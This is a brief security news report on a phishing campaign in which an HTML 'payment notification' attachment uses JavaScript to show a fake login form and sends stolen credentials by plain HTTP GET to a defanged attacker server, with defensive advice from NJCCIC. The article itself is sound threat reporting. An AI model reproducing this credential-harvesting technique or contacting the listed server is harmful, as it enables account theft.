A unique phishing campaign is using a new technique in an attempt to steal email account credentials.

The phishing email contains simple text referencing an attached payment notification in an HTML file format, says the New Jersey Cybersecurity and Communications Integration Cell (NJCCIC). Rather than redirecting the user to a remote site when opened, JavaScript in the attached file prompts a login form directly within the user’s browser which, in turn, can bypass security software.

This generated form includes various email account login options and requests the user to enter their corresponding credentials, notes the NJCCIC. If entered, an HTTP GET request containing the supplied credentials are delivered to the threat actors via a remote web server at hxxp://7l748.l748393.96.lt/. In addition, a request for a recovery e-mail and phone number is presented to the user and will also be sent to the same remote web server.

According to a post in the SANS ISC InfoSec Forum, "sending user’s credentials to a server and then redirecting their browser to a legitimate site is a fairly common behavior for a phishing page. Although, to add insult to injury, in this case the phishing page not only steals the credentials but also transmits them over the network without any encryption in plain HTTP."

The NJCCIC recommends users refrain from opening attachments delivered with unexpected or unsolicited emails, including those from known senders. If credential compromise is suspected, users are advised to change credentials across all accounts that use the same login information and enable multi-factor authentication where available.